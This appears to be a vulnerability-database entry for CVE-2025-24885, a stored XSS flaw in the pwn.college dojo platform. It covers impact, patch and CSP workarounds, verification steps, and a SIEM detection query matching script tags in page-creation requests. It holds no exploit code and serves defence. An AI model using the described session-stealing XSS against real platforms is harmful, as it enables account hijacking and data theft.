CVE-2025-24885
📋 TL;DR
This vulnerability allows unprivileged users to create stored cross-site scripting (XSS) attacks on the pwn.college education platform by exploiting missing access controls when rendering custom dojo pages. Any user of the platform can inject malicious scripts that execute in other users' browsers when they view affected pages. The platform administrators and all users are affected by potential data theft or session hijacking.
💻 Affected Systems
- pwn.college dojo platform
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, hijack user accounts, perform actions as authenticated users, deface the platform, or redirect users to malicious sites, potentially compromising the entire user base.
Likely Case
Malicious users create XSS payloads in custom pages that steal session tokens from other users, leading to account compromise and unauthorized access to educational content.
If Mitigated
With proper input validation and output encoding, XSS payloads would be rendered harmless as text rather than executable code.
🎯 Exploit Status
Exploitation requires user authentication but minimal privileges. Attackers need to understand XSS payload creation and the platform's page rendering mechanism.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Latest version with the security fix
Vendor Advisory: https://github.com/pwncollege/dojo/security/advisories/GHSA-8m79-rmhw-rg84
Restart Required: No
Instructions:
1. Update to the latest version of pwn.college dojo platform. 2. Ensure all custom page rendering functions implement proper access controls. 3. Verify that user input is properly sanitized and output is encoded.
🔧 Temporary Workarounds
Disable custom page creation
allTemporarily disable the ability for users to create custom dojo pages until patching is complete.
Implement Content Security Policy
allDeploy a strict Content Security Policy header to mitigate XSS impact by restricting script execution sources.
Content-Security-Policy: default-src 'self'; script-src 'self'
🧯 If You Can't Patch
- Implement web application firewall rules to block XSS payload patterns in user-generated content
- Enable strict input validation and output encoding for all user-controlled data rendered in pages
🔍 How to Verify
Check if Vulnerable:
Test if unprivileged users can create custom pages with script tags that execute when viewed by other users.Check Version:
Check the platform version against the patched version mentioned in the advisory.Verify Fix Applied:
Attempt to inject XSS payloads in custom pages and verify they are properly sanitized and don't execute.📡 Detection & Monitoring
Log Indicators:
- Unusual custom page creation patterns
- Multiple failed XSS attempts in logs
- User reports of unexpected page behavior
Network Indicators:
- Suspicious script tags in HTTP requests
- Unexpected external resource loading from user pages
SIEM Query:
search 'POST /create_page' AND contains(body, '<script>') OR contains(body, 'javascript:')